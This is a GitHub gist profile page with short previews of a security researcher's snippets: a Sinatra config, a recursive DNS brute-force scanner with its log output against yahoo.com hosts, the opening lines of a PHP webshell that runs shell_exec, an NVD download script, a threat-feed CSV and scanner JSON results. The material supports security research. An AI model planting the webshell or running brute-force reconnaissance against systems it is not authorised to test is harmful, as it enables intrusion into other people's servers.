Skip to content

Instantly share code, notes, and snippets.

View jcran's full-sized avatar
💭
feelin fancy

Jonathan Cran jcran

💭
feelin fancy
View GitHub Profile
===== config.ru
require 'api' # Loads the app(s)
map("/v1/component_a") do
run Sinatra.new(Pwnix::ComponentA)
end
map("/v1/component_b") do
run Sinatra.new(Pwnix::ComponentB)

Best UNIX Shell tools

These are a list of usages of shell commands I can't live without on UNIX-based systems.

Install

Mac OS X

Using Homebrew (yes, I am opinionated) you can install the following tools with the following packages:

module Intrigue
module Scanner
class RecursiveDnsBrute < Intrigue::Scanner::Base
private
### Main "workflow" function
#
def _recurse(entity, depth)
17:53:06 worker.1 | [-] dns_brute_sub: Hit exception: no address for ns221.yahoo.com
17:53:07 worker.1 | [-] dns_brute_sub: Hit exception: no address for ns222.yahoo.com
17:53:07 worker.1 | [-] dns_brute_sub: Hit exception: no address for us.m11.yahoo.com
17:53:07 worker.1 | [-] dns_brute_sub: Hit exception: no address for us.m12.yahoo.com
17:53:07 worker.1 | [-] dns_brute_sub: Hit exception: no address for us.m21.yahoo.com
17:53:07 worker.1 | [-] dns_brute_sub: Hit exception: no address for us.m22.yahoo.com
17:53:07 worker.1 | [-] dns_brute_sub: Hit exception: no address for w11.yahoo.com
17:53:07 worker.1 | [-] dns_brute_sub: Hit exception: no address for w12.yahoo.com
17:53:07 worker.1 | [-] dns_brute_sub: Hit exception: no address for w21.yahoo.com
17:53:07 worker.1 | [-] dns_brute_sub: Hit exception: no address for w22.yahoo.com
@jcran
jcran / webshell.php
Created April 8, 2016 07:09 — forked from RyanKung/webshell.php
a simple webshell
<?php session_start(); ?>
<?php
if (empty($_SESSION['path'])) {
$_SESSION['user'] = shell_exec('whoami');
$_SESSION['host'] = shell_exec('hostname');
$_SESSION['path'] = dirname(__FILE__);
}
function showInfo($cmd) {
$user = $_SESSION['user'];
@jcran
jcran / nvd_download.sh
Created January 29, 2018 20:28 — forked from christiangalsterer/nvd_download.sh
Script to download the National Vulnerability Database files from https://nvd.nist.gov
#!/bin/sh
# https://gist.github.com/christiangalsterer/5f55389b9c50c74c31b9
# Copyright 2015 Christian Galsterer
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
name, techniques, technologies, installations
“feed XYZ”, “mostly network IDS”, “uses snort + ET”, “installed at universities”
"feed abc", "endpoint", "uses OSSEC", "installed at financial institutions and amazon"
{
"success": true,
"message": "success",
"result": [{
"first_seen": "2020-02-12 08:11:23 UTC",
"last_seen": "2020-04-04 03:04:52 UTC",
"alias_group": "0.81279e5",
"name": "http://104.18.210.56:80",
"organization": "intrigueio",
"ancestors": [{
{
"success": true,
"message": "success",
"result": [
{
"entity_type": "Intrigue::Entity::Uri",
"pretty_name": "Insecure Content Loaded",
"first_seen": "2020-03-07 02:53:00 UTC",
"alias_group_id": "0.8119e5",
"last_seen": "2020-04-04 03:04:50 UTC",
{
"success": true,
"message": "success",
"result": [
{
"entity_type": "Intrigue::Entity::Uri",
"pretty_name": "Insecure Content Loaded",
"first_seen": "2020-03-07 02:53:00 UTC",
"alias_group_id": "0.8119e5",
"last_seen": "2020-04-04 03:04:50 UTC",